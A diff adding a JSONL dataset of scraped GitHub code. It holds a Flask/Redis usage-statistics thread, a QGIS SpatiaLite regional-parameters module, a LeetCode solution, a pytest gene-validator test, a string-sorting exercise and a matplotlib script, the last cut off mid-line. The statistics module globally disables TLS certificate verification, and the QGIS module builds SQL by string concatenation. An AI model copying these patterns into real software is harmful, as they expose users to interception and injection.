diff --git "a/5901.jsonl" "b/5901.jsonl" new file mode 100644--- /dev/null +++ "b/5901.jsonl" @@ -0,0 +1,1528 @@ +{"seq_id":"25334504005","text":"import time\nimport ssl\nimport json\nimport functools\nimport threading\n\nimport logging as logger\nfrom queue import Queue, Empty\nfrom datetime import datetime, timedelta\n\nfrom flask import request\n\nfrom util.common_util import CommonUtil\nfrom service.redis_service import redis_client, host_name, get_running_port\n\nlogger = logger.getLogger(__name__)\n\n\ndef statistics_recognize(service_name: str):\n def decorate(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n task = dict(service_name=service_name, now=datetime.now(), ip=request.remote_addr)\n logger.info('receive statistics task: {} service was called'.format(service_name))\n logger.info('request_host:%s,request.environ: %s ,request.remote_addr= %s, user_agent=%s',\n request.host, request.remote_user, request.remote_addr, request.user_agent)\n if not StatisticsThread.is_full():\n StatisticsThread.put_task(task)\n return func(*args, **kwargs)\n return wrapper\n return decorate\n\n\ndef start_daemon_thread():\n ssl._create_default_https_context = ssl._create_unverified_context\n worker = StatisticsThread()\n worker.name = 'daemon-statistics-loop'\n worker.daemon = True\n worker.start()\n\n\nclass StatisticsThread(threading.Thread):\n \"\"\"\n\n \"\"\"\n # 放外面不生效,更改\n interval = int(redis_client.hget('Deep_fashion', 'interval') or 10)\n statis_tasks_q = Queue(maxsize=1000)\n\n @classmethod\n def put_task(cls, task):\n try:\n cls.statis_tasks_q.put_nowait(task)\n except Exception as e:\n logger.error('put task to queue fail, full: {}'.format(cls.statis_tasks_q.full()))\n\n @classmethod\n def get_task(cls, timeout=None):\n return cls.statis_tasks_q.get(block=True, timeout=timeout)\n\n @classmethod\n def is_full(cls):\n return cls.statis_tasks_q.full()\n\n @property\n def qsize(self):\n return self.statis_tasks_q.qsize()\n\n # def statistics_compute(self, task_json):\n # \"\"\"\n # 延时写入,一个时间内总次数,减少Redis的访问次数\n # :param service_name:\n # :return:\n # \"\"\"\n # now = task_json.get('now', datetime.now())\n # for s, t in task_json.items():\n # self._count(s, now, t)\n\n def run(self):\n lst = []\n timer = retry = 0\n logger.info('models statistics daemon running ...')\n while True:\n try:\n try:\n task = self.get_task(timeout=0.01)\n except Empty as e:\n logger.error('Error in get_task from Queue: %s', e)\n timer += 2\n time.sleep(timer if timer < 50 else 50)\n else:\n lst.append(task)\n timer = 0\n\n now = datetime.now()\n logger.debug('lst=%s,now.minute %sinterval=%s' % (len(lst), now.minute, now.minute % self.interval == 0))\n # if now.minute % self.interval == 0 and lst or len(lst) > 1000 or timer > 600: # timer没有意义\n if now.minute % self.interval == 0 and lst or len(lst) > 1000:\n # 三种情况:正常-时间间隔和快-累积量,慢的话就阻塞时间\n if self.qsize > 0 and timer == 0 and retry < 900:\n # 确保出发处理略过的是累计的任务,\n retry += 1\n continue\n logger.info('handle task: {}'.format(len(lst)))\n self.test_count(lst)\n self.refresh_interval()\n lst.clear()\n timer = retry = 0\n time.sleep(60)\n except Exception as e:\n logger.exception('exception: {}'.format(CommonUtil.get_exception_info()))\n logger.info('Error,handwriting=%s', e)\n\n @classmethod\n def test_count(cls, lst):\n \"\"\"\n 感觉增加了一个缓存写入,复杂度上升了一个级别\n :param lst:\n :return:\n \"\"\"\n result = {}\n now = lst[0].get('now')\n end_now = lst[-1].get('now')\n # 临界的时间,没有处理,第二天开始的统计,会被加到第一天\n if end_now.day != now.day:\n result.update({datetime.strftime(end_now, '_%Y-%m-%d'): {}})\n\n result.update({datetime.strftime(now, '_%Y-%m-%d'): {}})\n logger.info('lst: %s', len(lst))\n\n for task in lst:\n # 统计各时间间隔的频次\n service_name = task.get('service_name')\n ip = task.get('ip')\n now = task.get('now')\n now_while = str((now.minute // cls.interval) * cls.interval).zfill(2)\n next_while = (now.minute // cls.interval + 1) * cls.interval\n # todo 对应的统计处该为[1],换成时间间隔后一节点会出现跨区问题,也就是12:60应该写成1:00,\n # 也就是会有个进位时间间隔换成时间点本身就不太合适\n next_while = str(next_while if next_while <= 60 else 60).zfill(2)\n now_tm = datetime.strftime(now, '_%Y-%m-%d')\n period = '%d:%s-%d:%s' % (now.hour, now_while, now.hour, next_while)\n tem_result = result.get(now_tm)\n\n if service_name not in tem_result.keys():\n tem_result.update({service_name: {}})\n service_dic = tem_result.get(service_name)\n if ip not in service_dic.keys():\n service_dic.update({ip: {}})\n ip_statistic = service_dic.get(ip)\n ip_statistic[period] = ip_statistic[period]+1 if ip_statistic.get(period) else 1\n\n logger.info('service count:%s', result)\n port = get_running_port()\n node = host_name + ':' + str(port)\n\n for now_ts, dic in result.items():\n for service_name, service_dic in dic.items():\n hash_table = service_name + now_ts\n node_statis = redis_client.hget(hash_table, node, ) or str({})\n logger.debug('node_statis %s', node_statis)\n redis_preiod_dic = json.loads(node_statis)\n\n for ip_name, ip_dic in service_dic.items():\n redis_ip_dic = redis_preiod_dic.get(ip_name)\n if redis_ip_dic:\n for k, v in ip_dic.items():\n redis_ip_dic[k] = (redis_ip_dic.get(k) or 0) + v\n else:\n redis_preiod_dic.update({ip_name: ip_dic})\n print('redis_preiod_dic', redis_preiod_dic)\n redis_client.hset(hash_table, node, json.dumps(redis_preiod_dic))\n redis_client.expire(hash_table,timedelta(days=30))\n logger.info('hash_table: {}, field: {}, new_dic: {}'.format(hash_table, node, service_dic))\n\n def refresh_interval(self):\n self.interval = int(redis_client.hget('Deep_fashion', 'interval') or 10)\n logger.info('Interval was refresh,interval={}'.format(self.interval))\n","repo_name":"guanfeix/tem_image_filter","sub_path":"util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2037877464","text":"from __future__ import absolute_import\nfrom builtins import map\nfrom builtins import str\nfrom builtins import range\nfrom builtins import object\nfrom datetime import datetime\n\nfrom qgis.PyQt.QtCore import QSettings\nfrom qgis.core import QgsDataSourceUri\nfrom .DataManagement.SpatialAttributesSampler import SpatialAttributesSampler\nfrom .DataManagement.spatialHelpers import *\nfrom .DataManagement.LookupLogger import LookupLogger\nimport sqlite3 as lite\nfrom calendar import isleap\ndef addQuotes(x): return \"'\" + x + \"'\"\n\nclass RegionalParameters(object):\n # Translate spatially and temporally resolved country-specific parameters to model output polygons. Samples values\n # rather than downscaling them.\n # Parameters: Times of waking, sleeping and duration over which sleep/wake transition occurs; economic status rating; summer cooling\n # Provides a value for every output feature.\n # Parameters MUST have a set attribute names: t_sleep, t_wake, transition, ecostatus, smrcooling\n def __init__(self, logger=LookupLogger()):\n self.logger = logger\n self.worldAttributes = SpatialAttributesSampler(logger)\n self.dburi = None # Database URI\n self.dbschema = None # Database schema containing table(s) of interest\n self.dbtable = None # Database table containing world features\n self.databaseLocation = None # File containing sqlite database\n\n self.templateShapefile = None\n self.templateEpsgCode = None\n self.outputLayer = None # actual qgsVectorLayer representing output layer\n self.countryAssignments = None # Pandas series containing the country assigned to each ID used in the output layer\n\n # Store raw values from database\n self.attrs = None\n self.wdBuildingCycles = None\n self.weBuildingCycles = None\n self.wdTransportCycles = None\n self.weTransportCycles = None\n self.weekendDays = None\n self.fixedHolidays = None\n # Placeholders for populations. Note population is used to disaggregate national totals, which are per person.\n self.resPops = None # Residential populaton in buildings\n self.vehPop = None # Effective population in vehicle emitting areas\n self.metabPop = None # Residential population in metabolism-friendly areas\n\n # set new QGIS project layers (created herein) to inherit the project EPSG code (initially) to avoid annoying popups\n s = QSettings()\n s.setValue(\"/Projections/defaultBehaviour\", \"useProject\")\n\n # SETTERS\n def setWorldDatabase(self, database):\n '''Sets the world database\n :param database: Local database file (hard coded properties are used in this function)\n :return: Nothing (stores self.attributedOutputLayer, which contains assignments)\n '''\n\n if not os.path.exists(database):\n raise ValueError('LQF Database file ' + database + ' not found')\n self.databaseLocation = database\n self.dburi = QgsDataSourceUri()\n self.dburi.setDatabase(database)\n self.dbschema = ''\n self.dbtable = 'World'\n\n def setOutputShapefile(self, filename, epsgCode, id_field=None):\n '''\n Sets output areas for object and assigns country ID to each of them (takes a long time if many features)\n :param filename: Shapefile filename\n :param epsgCode: EPSG code (int)\n :param id_field: Name of field/attribute containing unique feature IDs\n :return: Filename of shapefile with country assignments added\n '''\n self.worldAttributes.setOutputShapefile(filename, epsgCode, id_field)\n\n if self.dburi is None:\n raise ValueError('setWorldDatabase() must be called first')\n\n # Get output area's overall bounding box\n self.worldAttributes.outputLayer.selectAll()\n bbox = self.worldAttributes.outputLayer.boundingBoxOfSelected()\n # Get a layer that includes just the countries intersecting and containing the bbox of the output areas\n\n # Return the geometries of matching countries, converted to the same CRS as the output\n sql = \"(select admin, geom, ST_Transform( geom , \" + str(self.worldAttributes.templateEpsgCode) + \" ) as transformed_geom FROM \" + self.dbtable + \")\"\n geom_column = 'transformed_geom'\n\n # The following statement converts the bbox of our output area to EPSG 4326, and finds countries that intersect this\n polygonText = \"ST_Intersects(ST_Transform(SetSRID(GeomFromText('%s'), %s), 4326), geom)\"% (bbox.asWktPolygon(), str(self.worldAttributes.templateEpsgCode))\n\n # E.g the following query selects greece\n #SELECT name FROM World WHERE ST_Intersects(ST_Transform(SetSrid(GeomFromText(\"POLYGON((309045.14839637035038322 3892853.22750130295753479, 345275.02064901700941846 3892853.22750130295753479, 345275.02064901700941846 3926290.0938413473777473, 309045.14839637035038322 3926290.0938413473777473, 309045.14839637035038322 3892853.22750130295753479))\"), 32635), 4326), geom)\n self.dburi.setDataSource(self.dbschema, sql, geom_column, polygonText)\n vlayer = QgsVectorLayer(self.dburi.uri(), \"Matched countries\", 'spatialite')\n # Build list of country names\n vlayer.selectAll()\n countries = []\n for f in vlayer.getFeatures():\n countries.append(f['admin'])\n\n # Connect to SpatiaLite database\n con = None\n con = lite.connect(self.databaseLocation)\n self.extractPropertiesForCountries(con, countries)\n # Create a list of DOYs for each country and put into dataframe\n\n # Assign country name to output areas\n # Take a temporary local copy of the world map to prevent going back to the database every time a feature is looke dup\n fobj,tempLayerFile = tempfile.mkstemp('.shp')\n os.close(fobj)\n saveLayerToFile(vlayer, tempLayerFile, vlayer.crs())\n\n tl = loadShapeFile(tempLayerFile, 4326)\n self.attributedOutputLayer = self.worldAttributes.resampleLayer(tl, ['admin'], inputIdField='admin')\n tl = None\n vlayer = None\n try:\n os.remove(tempLayerFile) # Delete temporary file\n except:\n pass\n\n # Assign this population as vehicle, residential and metabolisng population data frames\n # This can be overriden later to inject specific distributions for the population types\n df = shapefile_attributes(self.attributedOutputLayer)\n df.index = list(map(intOrString, df[self.worldAttributes.templateIdField]))\n self.countryAssignments = df\n\n return self.attributedOutputLayer # This should be saved so it can be used with self.injectSampledLayer to save time later\n\n def injectMetabPopLayer(self, filename, epsgCode):\n '''\n Inject a population shapefile that shows the distribution of the metabolising population.\n The features must be identical to those in the output layer\n :param filename: Shapefile path\n :param epsgCode: EPSG of shapefile\n :return: Nothing. Assigns object properties\n '''\n lyr = openShapeFileInMemory(filename, epsgCode, 'temp layer')\n ser = shapefile_attributes(lyr)\n ser.index = list(map(intOrString, ser[self.worldAttributes.templateIdField]))\n self.metabPop = ser['Pop']\n lyr = None\n\n def injectVehPopLayer(self, filename, epsgCode):\n '''\n Inject a population shapefile that shows the distribution of the vehicle population.\n The features must be identical to those in the output layer\n :param filename: Shapefile path\n :param epsgCode: EPSG of shapefile\n :return: Nothing. Assigns object properties\n '''\n lyr = openShapeFileInMemory(filename, epsgCode, 'temp layer')\n ser = shapefile_attributes(lyr)\n ser.index = list(map(intOrString, ser[self.worldAttributes.templateIdField]))\n self.vehPop = ser['Pop']\n lyr = None\n\n def injectResPopLayer(self, filename, epsgCode):\n '''\n Inject a population shapefile that shows the distribution of the residential population.\n The features must be identical to those in the output layer\n :param filename: Shapefile path\n :param epsgCode: EPSG of shapefile\n :return: Nothing. Assigns object properties\n '''\n lyr = openShapeFileInMemory(filename, epsgCode, 'temp layer')\n ser = shapefile_attributes(lyr)\n ser.index = list(map(intOrString, ser[self.worldAttributes.templateIdField]))\n self.resPops = ser['Pop']\n lyr = None\n\n def injectAttributedOutputLayer(self, filename, epsgCode, id_field=None):\n '''\n Sets output areas for object and assigns country ID to each of them (takes a long time if many features)\n :param database: Local database file (hard coded properties are used in this function)\n :return: Nothing (stores self.attributedOutputLayer, which contains assignments)\n '''\n self.worldAttributes.setOutputShapefile(filename, epsgCode, id_field)\n self.attributedOutputLayer = openShapeFileInMemory(filename, epsgCode, 'attributed output areas')\n if self.dburi is None:\n raise ValueError('setWorldDatabase() must be called first')\n\n # Unlike setOutputShapefile(), this already has the required country ID in the 'admin' field\n # so no need to do spatial indexing\n df = shapefile_attributes(self.attributedOutputLayer)\n if 'admin' not in df.columns:\n raise ValueError('A valid attributed output layer must have the field \"admin\" in it.')\n\n countries = df['admin'].dropna().unique()\n\n df = None\n # Connect to SpatiaLite database and populate object with country-specific attributes and holidays\n con = None\n con = lite.connect(self.databaseLocation)\n self.extractPropertiesForCountries(con, countries)\n ca = shapefile_attributes(self.attributedOutputLayer)\n ca.index = list(map(intOrString, ca[self.worldAttributes.templateIdField]))\n self.countryAssignments = ca\n\n def extractPropertiesForCountries(self, con, countries):\n '''\n Pull all country-specific data from database and put into pandas dataframe with appropriate indexing.\n :param con: Database connection object (SQLIte)\n :param countries: list of countries for which to get data\n :return: Nothing. Populates object fields instead.\n '''\n # All years are taken here, and accounted for upon this objected being queried\n attrs = \"SELECT * FROM attributes WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \") ORDER BY as_of_year ASC\"\n self.attrs = pd.read_sql(attrs, con, index_col=['id', 'as_of_year'])\n\n # Weekend and weekday building diurnal cycles for each country\n wdBuildingCycles = \"SELECT * FROM weekdayBuildingCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.wdBuildingCycles = pd.read_sql(wdBuildingCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.wdBuildingCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekday building cycles for: ' + str(diffs))\n\n weBuildingCycles = \"SELECT * FROM weekendBuildingCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.weBuildingCycles = pd.read_sql(weBuildingCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.weBuildingCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekend building cycles for: ' + str(diffs))\n\n # Weekend and weekday transport diurnal cycles for each country\n wdTransportCycles = \"SELECT * FROM weekdayTransportCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.wdTransportCycles = pd.read_sql(wdTransportCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.wdTransportCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekday transport cycles for: ' + str(diffs))\n\n weTransportCycles = \"SELECT * FROM weekendTransportCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.weTransportCycles = pd.read_sql(weTransportCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.weTransportCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekend transport cycles for: ' + str(diffs))\n\n weekendDays = \"SELECT * FROM weekendDays WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.weekendDays = pd.read_sql(weekendDays, con, index_col=['id']) # Column names are Mon, Tue...\n diffs = set(countries).difference(list(self.weekendDays.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no list of weekday/weekend days for: ' + str(diffs))\n\n # Get fixed holiday day of years (assuming not leap year)\n fixedHols = \"SELECT * FROM fixedholidays WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n fixedHols = pd.read_sql(fixedHols, con)\n self.fixedHolidays = {c: list(fixedHols['DOY'].loc[fixedHols['id'] == c]) for c in countries}\n\n\n ## GETTERS\n def getNationalAttributes(self, year):\n '''\n Retrieve national data for the specified year for the country(ies) intersected by the output layer.\n When the requested year is not available, the most recent match is used.\n If there is no most recent match, an exception is thrown\n :param year: Int: Year represented by data.\n :return: Dict of attributes: {country: {attrib: val}}.\n '''\n\n if type(year) is not int:\n raise ValueError('Year must be an integer year between 1000 and 3000')\n\n if (year < 1000) or (year > 3000):\n raise ValueError('Year must be an integer year between 1000 and 3000')\n\n # Retrieve national data for country and year\n countries = self.weTransportCycles.index.unique() # Purely for the primary key\n\n # Get most up-to-date data for this country in this period\n cols = ['population', 'kwh_year', 'wakeTime', 'sleepTime', 'transition', 'summer_cooling', 'ecostatus','cars', 'motorcycles', 'freight']\n arr = pd.DataFrame(index = countries, columns = cols)\n for c in countries:\n # Get scalars first\n arr[:].loc[c] = pd.Series({'population' : self.attrs['population'][c].dropna().asof(year),\n 'kwh_year' : self.attrs['kwh_year'][c].dropna().asof(year),\n 'wakeTime' : self.attrs['wake_hour'][c].dropna().asof(year),\n 'sleepTime' : self.attrs['sleep_hour'][c].dropna().asof(year),\n 'transition' : self.attrs['transition_time'][c].dropna().asof(year),\n 'summer_cooling' : self.attrs['summer_cooling'][c].dropna().asof(year),\n 'ecostatus' : self.attrs['ecostatus'][c].dropna().asof(year),\n 'cars' : self.attrs['cars'][c].dropna().asof(year),\n 'motorcycles' : self.attrs['motorcycles'][c].dropna().asof(year),\n 'freight' : self.attrs['freight'][c].dropna().asof(year)})\n # Keep track of what value provided for each country and year\n attrNames = ['population', 'kwh_year', 'wake_hour', 'sleep_hour', 'transition_time', 'summer_cooling', 'ecostatus', 'cars', 'motorcycles', 'freight']\n for attrName in attrNames:\n lookedUp = self.attrs[attrName][c].dropna().asof(year)\n yearLookedUp = self.attrs[attrName][c].dropna().index.asof(year)\n self.logger.addEvent('National attribute', None, None, None, 'DB value for %s %s in modelled year %d: %s (%d value)'%(c, attrName, year, str(lookedUp), yearLookedUp))\n\n if not pd.Series(arr[:].loc[c]).notnull().all():\n raise Exception('Cannot model ' + c + ' in year ' + str(year) + ' because there is not enough nation-level information up to this period')\n\n return arr\n\n def isWeekend(self, featureIds, date):\n '''\n Given a particular date and country, gives True or False to answer \"Is it the weekend?\"\n :param featureIds: list or pd.index of feature IDs\n :param date: datetime (UTC)\n :return: True (it's the weekend) or False (it's a weekday)\n '''\n # Get list of 1 or 0 with no index.\n days = self.countryAssignments.loc[featureIds].join(self.weekendDays[['Mon', 'Tue', 'Wed', 'Thu', 'Fri','Sat', 'Sun']], on='admin')[['Mon', 'Tue', 'Wed', 'Thu', 'Fri','Sat', 'Sun']]\n days.columns = list(range(0,7))\n return days[date.weekday()] > 0\n\n def getWeekendDaysByRegion(self):\n '''\n :return: dict of {country: [int, int]} that shows which days of the week (0-6 = Monday-Sunday) are weekend days\n '''\n tempDays = self.weekendDays[['Mon', 'Tue', 'Wed', 'Thu', 'Fri','Sat', 'Sun']]\n tempDays.columns = list(range(7))\n return {idx: tempDays.columns[tempDays.loc[idx] > 0] for idx in tempDays.index}\n\n # def getCyclesForFeatureIDs(self, featureIds, weekend):\n # '''\n # Get the 24-hour diurnal cycle of energy use for the specified feature IDs\n # :param featureIds: list or pd.index of feature IDs\n # :param weekend: pd.Series of true or false describing if it is the weekend (true) or weekday (false) at each feature ID\n # :return: pd.dataframe with 25 columns: Country name and hour of day. Each represents the preceding hour\n # '''\n #\n # # Get all weekday cycles\n # vals = self.countryAssignments.loc[featureIds].join(self.weekendCycles, on='admin')\n # # Overwrite with weekend versions if needed#\n #\n # weekendIndices = weekend.index[weekend]\n # vals[:].loc[weekendIndices] = self.countryAssignments.loc[weekendIndices].join(self.weekendCycles, on='admin')\n # return vals\n\n def getTransportCycles(self, weekend):\n '''\n Get all transport diurnal cycles for the countries overlapped by the features in the output layer\n :param weekend: Return weekend cycle (True) or weekday (False)\n :return: pd.DataFrame with 24 columns (1 for each hour) indexed by country name\n '''\n if weekend:\n return self.weTransportCycles\n else:\n return self.wdTransportCycles\n\n def getBuildingCycles(self, weekend):\n '''\n Get all building diurnal cycles for the countries overlapped by the features in the output layer\n :param weekend: Return weekend cycle (True) or weekday (False)\n :return: pd.DataFrame with 24 columns (1 for each hour) indexed by country name\n '''\n if weekend:\n return self.weBuildingCycles\n else:\n return self.wdBuildingCycles\n\n def getOutputLayer(self):\n # Gets the output layer\n if self.worldAttributes.outputLayer is not None:\n return self.worldAttributes.outputLayer\n else:\n raise Exception('The output layer has not yet been set!')\n\n def getAttribsTable(self, featureId, requestYear):\n '''\n Get pandas data frame of attributes for each output feature on requested date\n :param featureId: Pandas series of feature Id(s) for which to return attributes (non-matching ones get NA)\n :param requestYear: DateTime object containing requested date\n :return: pandas data frame indexed by chosen unique identifier of each output area\n '''\n if type(featureId) is pd.Index:\n featureId = featureId.tolist()\n\n # Country assignments\n # This can be overriden later to inject specific distributions for the population types\n countryAssignments = shapefile_attributes(self.attributedOutputLayer)\n countryAssignments.index = list(map(intOrString, countryAssignments[self.worldAttributes.templateIdField]))\n\n # Get national attributes for each country\n attrs = self.getNationalAttributes(requestYear)\n # Combine the populations\n allPops = pd.concat([countryAssignments['admin'], self.resPops, self.vehPop, self.metabPop], axis=1)\n allPops.columns = ['admin','resPop', 'vehPop', 'metabPop']\n # Join list of names to national attributes\n attrs = allPops[:].loc[featureId].join(attrs, on='admin')\n return attrs\n\n def getEnergyUse(self, featureId, requestYear):\n '''\n Return kwh per year used in each output area\n :param featureId:\n :param requestYear:\n :return:\n '''\n # Get national energy consumption associated to each output area\n # Multiply it by fraction of population in this output area\n data = self.getAttribsTable(featureId, requestYear)\n return data['kwh_year'] * data['resPop']/data['population'] # Disaggregate energy use by building borne population\n\n def getVehCount(self, featureId, requestYear):\n '''\n Return vehicle counts per year used in each output area\n :param featureId:\n :param requestYear:\n :return:\n '''\n data = self.getAttribsTable(featureId, requestYear)\n # Vehicle counts in DB are vehicles per 1,000 people, so this is calculated per populated area by counting the local pop in 1000s\n return (data[['cars', 'motorcycles', 'freight']].transpose() * data['vehPop']/1000).transpose() # Disaggregate by vehicle \"population\"\n\n def getMetabPop(self, featureId, requestYear):\n '''\n Return population spread across \"metabolism friendly\" areas e.g. parks and streets as well as buildings\n :param featureId:\n :param requestYear:\n :return:\n '''\n data = self.getAttribsTable(featureId, requestYear)\n # Vehicle counts in DB are vehicles per 1,000 people, so this is calculated per populated area by counting the local pop in 1000s\n return data['metabPop'] # It's just the number of people in each feature ID\n\n def getFixedHolidays(self, startDate, endDate):\n '''\n Returns a list of fixed public holidays between the specified datetime objects\n :param startDate: datetime: First day to include in range\n :param endDate: datetime: Final day to include in range\n :return: dict: {countryName: [holidays]}: each entry in dict is list of datetime.date objects containing the holidays.\n '''\n if endDate < startDate:\n raise ValueError('End date is earlier than start date')\n\n def doyToLeapDatetime(x, year):\n return datetime.strptime(str(year)+str(x+1 if (x > 59) and isleap(year) else x), '%Y%j').date()\n output = {}\n for c in list(self.fixedHolidays.keys()):\n output[c] = []\n for y in range(startDate.year, endDate.year+1):\n null = [output[c].append(doyToLeapDatetime(d, y)) for d in self.fixedHolidays[c]]\n\n return output\n\n def getDominantCountry(self):\n ''' Returns the dominant country: the one that intersects the largest number of output features. '''\n\n return self.countryAssignments['admin'].dropna().value_counts().sort_values(ascending=False).index[0]","repo_name":"UMEP-dev/UMEP","sub_path":"LucyQF/PythonLUCY/RegionalParameters.py","file_name":"RegionalParameters.py","file_ext":"py","file_size_in_byte":23652,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"10337998799","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n idx_min = 0\n min_p = 10000\n profit = 0\n for idx, p in enumerate(prices):\n iter_profit = 0\n if p < min_p:\n min_p = p\n idx_min = idx\n if p > min_p:\n iter_profit = p-min_p\n if iter_profit>profit: profit = iter_profit\n return profit","repo_name":"prasadgola/Leetcode","sub_path":"maxstock.py","file_name":"maxstock.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18590469670","text":"import pytest\n\nfrom larval_gonad.validation import GeneValidator\n\n\n@pytest.mark.parametrize(\n \"lit,missing,biomarkers,zscores,flag_protein,expected_score\",\n [\n # Fours: Lit Gene matches BioMarkers\n ## in situ\n ({\"G\"}, set(), {\"G\"}, set(), False, 4),\n ({\"G\", \"EPS\"}, set(), {\"G\", \"EPS\"}, set(), False, 4),\n ({\"G\", \"EPS\"}, {\"MPS\", \"EC\"}, {\"G\", \"EPS\", \"MPS\"}, set(), False, 4),\n ## protein expression\n ({\"G\"}, set(), {\"G\"}, set(), True, 4),\n ({\"EPS\"}, set(), {\"G\"}, set(), True, 4),\n ({\"G\", \"EPS\"}, set(), {\"G\", \"EPS\"}, set(), True, 4),\n ({\"EPS\", \"MPS\", \"LPS\"}, set(), {\"G\", \"EPS\"}, set(), True, 4),\n ({\"C2\"}, set(), {\"C1\"}, set(), True, 4),\n ({\"C1\", \"C2\", \"C3\"}, set(), {\"C1\", \"C2\"}, set(), True, 4),\n\n # Threes: Lit Gene matches Upper Quantile of Zscores\n ## in situ\n ({\"G\"}, set(), set(), {\"G\"}, False, 3),\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\"}, False, 3),\n ({\"G\", \"EPS\"}, {\"MPS\", \"EC\"}, set(), {\"G\", \"EPS\", \"MPS\"}, False, 3),\n ## protein expression\n ({\"G\"}, set(), set(), {\"G\"}, True, 3),\n ({\"EPS\"}, set(), set(), {\"G\"}, True, 3),\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\"}, True, 3),\n ({\"EPS\", \"MPS\", \"LPS\"}, set(), set(), {\"G\", \"EPS\"}, True, 3),\n ({\"C2\"}, set(), set(), {\"C1\"}, True, 3),\n ({\"C1\", \"C2\", \"C3\"}, set(), set(), {\"C1\", \"C2\"}, True, 3),\n\n # Twos: Lit Gene matches Lineage Biomarkers\n ## in situ\n ({\"G\", \"EPS\"}, set(), {\"G\", \"EPS\", \"MPS\"}, set(), False, 2),\n ({\"C1\", \"C4\"}, set(), {\"C1\", \"C2\", \"C3\"}, set(), False, 2),\n ({\"EPS\", \"MPS\", \"LPS\", \"P\"}, set(), {\"EPS\"},set(), False, 2),\n\n ## protein expression\n ({\"C1\", \"C2\"}, set(), {\"C1\", \"C2\", \"C3\"}, set(), True, 2),\n ({\"G\", \"EPS\"}, set(), {\"EPS\", \"MPS\"}, set(), True, 2),\n ({\"G\", \"EPS\", \"MPS\", \"P\"}, set(), {\"EPS\", \"MPS\"}, set(), True, 2),\n ({\"G\", \"EPS\", \"MPS\"}, set(), {\"EPS\", \"MPS\", \"P\"}, set(), True, 2),\n\n # Ones: Lit Gene matches Lineage Zscores\n ## in situ\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\", \"MPS\"}, False, 1),\n ({\"C1\", \"C4\"}, set(), set(), {\"C1\", \"C2\", \"C3\"}, False, 1),\n ({\"EPS\", \"MPS\", \"LPS\", \"P\"}, set(), set(), {\"EPS\"}, False, 1),\n ## protein expression\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\", \"MPS\"}, True, 1),\n\n # No class\n (set(), {\"G\"}, set(), set(), False, None),\n ## in situ\n ({\"G\"}, set(), set(), set(), False, None),\n ## protein expression\n ({\"G\"}, set(), set(), set(), True, None),\n ],\n)\ndef test_GeneValidator(lit, missing, biomarkers, zscores, flag_protein, expected_score):\n gene = GeneValidator(\"gene1\", lit, missing, biomarkers, zscores, flag_protein)\n assert gene.score == expected_score\n","repo_name":"jfear/larval_gonad","sub_path":"src/tests/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"31047364703","text":"\"\"\"\nAuthor: Le Tuan Luc\nDate: 2021/07/20\nProgram: exercise_04_page_85.py\nProblem:\n Assume that the variables x and y refer to strings. Write a code segment that prints these strings in alphabetical order. You should assume that they are not equal.\nSolution:\n >>>\n\"\"\"\nx = 'hello'\ny = 'world'\n\ndef alphabetical_order(string):\n string_temp = []\n for character in string:\n string_temp.append(character)\n\n for i in range(0, len(string)):\n for j in range(0, len(string)):\n if string_temp[i] < string_temp[j]:\n temp_character = string_temp[i]\n string_temp[i] = string_temp[j]\n string_temp[j] = temp_character\n\n string_output = \"\"\n for character in string_temp:\n string_output += character\n\n return string_output\n\nprint(alphabetical_order(x+y))\n ","repo_name":"FxLuc/python","sub_path":"chapter03/page_85/exercise_04_page_85.py","file_name":"exercise_04_page_85.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40480747984","text":"import matplotlib.pyplot as plt\n\nx_axis_labels = []\npreprocessing_points = []\nprocessing_points = []\nmemory_points = []\nduration_points = []\nwith open('results.csv') as f:\n f.readline()\n for line in f:\n row = line.split(',')\n x_axis_labels.append(int(row[0]))\n preprocessing_points.append(float(row[1]))\n processing_points.append(float(row[2]))\n memory_points.append(float(row[3]))\n duration_points.append(int(row[4]))\n\n# Plot the data for left axis\nfig, ax1 = plt.subplots()\nax1.set_xticks(x_axis_labels)\nax1.set_ylim([4500,7000])\nax1.plot(x_axis_labels, processing_points, '-ro', label='Processing Time')\n#ax1.plot(x_axis_labels, duration_points, '-bs', label='Duration')\n#plot the data for right axis\nax2 = ax1.twinx()\nax2.set_ylim([100,275])\nax2.plot(x_axis_labels, memory_points, '-g^', label='Memory')\n# apply labels and legend\nax1.set_xlabel('Parameter $\\\\tau$')\nax1.set_ylabel('Time 